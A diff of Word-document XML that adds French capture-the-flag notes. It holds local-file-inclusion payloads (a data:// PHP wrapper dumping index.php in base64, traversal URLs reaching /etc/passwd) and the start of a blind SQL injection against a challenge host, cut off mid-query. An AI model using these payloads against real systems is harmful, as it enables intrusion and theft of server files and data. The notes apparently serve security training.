--- a/Answer.docx
+++ b/Answer.docx
@@ -158,9 +158,2174 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p/>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9072" w:type="dxa"/>
+        <w:tblCellMar>
+          <w:left w:w="0" w:type="dxa"/>
+          <w:right w:w="0" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9068"/>
+        <w:gridCol w:w="4"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:tbl>
+            <w:tblPr>
+              <w:tblW w:w="12960" w:type="dxa"/>
+              <w:tblCellMar>
+                <w:left w:w="0" w:type="dxa"/>
+                <w:right w:w="0" w:type="dxa"/>
+              </w:tblCellMar>
+              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+            </w:tblPr>
+            <w:tblGrid>
+              <w:gridCol w:w="12960"/>
+            </w:tblGrid>
+            <w:tr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:noWrap/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                      <w:sz w:val="24"/>
+                      <w:szCs w:val="24"/>
+                      <w:lang w:eastAsia="fr-FR"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:t>LFI :</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:br/>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+                    <w:textAlignment w:val="top"/>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                      <w:sz w:val="24"/>
+                      <w:szCs w:val="24"/>
+                      <w:lang w:eastAsia="fr-FR"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                      <w:noProof/>
+                      <w:sz w:val="24"/>
+                      <w:szCs w:val="24"/>
+                      <w:lang w:eastAsia="fr-FR"/>
+                    </w:rPr>
+                    <w:drawing>
+                      <wp:inline distT="0" distB="0" distL="0" distR="0">
+                        <wp:extent cx="8255" cy="8255"/>
+                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                        <wp:docPr id="4" name="Image 4" descr="https://mail.google.com/mail/u/0/images/cleardot.gif"/>
+                        <wp:cNvGraphicFramePr>
+                          <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                        </wp:cNvGraphicFramePr>
+                        <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                            <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                              <pic:nvPicPr>
+                                <pic:cNvPr id="0" name="Picture 5" descr="https://mail.google.com/mail/u/0/images/cleardot.gif"/>
+                                <pic:cNvPicPr>
+                                  <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                </pic:cNvPicPr>
+                              </pic:nvPicPr>
+                              <pic:blipFill>
+                                <a:blip r:embed="rId7">
+                                  <a:extLst>
+                                    <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                      <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                    </a:ext>
+                                  </a:extLst>
+                                </a:blip>
+                                <a:srcRect/>
+                                <a:stretch>
+                                  <a:fillRect/>
+                                </a:stretch>
+                              </pic:blipFill>
+                              <pic:spPr bwMode="auto">
+                                <a:xfrm>
+                                  <a:off x="0" y="0"/>
+                                  <a:ext cx="8255" cy="8255"/>
+                                </a:xfrm>
+                                <a:prstGeom prst="rect">
+                                  <a:avLst/>
+                                </a:prstGeom>
+                                <a:noFill/>
+                                <a:ln>
+                                  <a:noFill/>
+                                </a:ln>
+                              </pic:spPr>
+                            </pic:pic>
+                          </a:graphicData>
+                        </a:graphic>
+                      </wp:inline>
+                    </w:drawing>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+          </w:tbl>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="fr-FR"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
+                <w:color w:val="444444"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="fr-FR"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>data://text/plain,&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">?php </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>echo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> base64_encode(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>file_get_contents</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>("</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>index.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>")); ?&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:color w:val="1155CC"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:color w:val="1155CC"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+            <w:u w:val="single"/>
+            <w:lang w:eastAsia="fr-FR"/>
+          </w:rPr>
+          <w:t>http://example.com/index.php?page=a/./.[ADD</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t> MORE]/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>passwd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:color w:val="1155CC"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+            <w:u w:val="single"/>
+            <w:lang w:eastAsia="fr-FR"/>
+          </w:rPr>
+          <w:t>http://example.com/index.php?page=a/../../../../[ADD</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t> MORE]../../../../../etc/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CEF5361" wp14:editId="78FAE9D2">
+            <wp:extent cx="5760720" cy="1212850"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:docPr id="10" name="Image 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1212850"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5497234A" wp14:editId="45319EA8">
+            <wp:extent cx="5760720" cy="1343660"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="11" name="Image 11"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1343660"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId13" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+            <w:lang w:eastAsia="fr-FR"/>
+          </w:rPr>
+          <w:t>https://www.base64decode.org/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pour décoder</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>UNION SQL BLIND :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>id = 3 return vrai</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>id = 4 return rien</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>chall.bunkerity.com:8002/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>article.php</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=3 AND </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>database</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
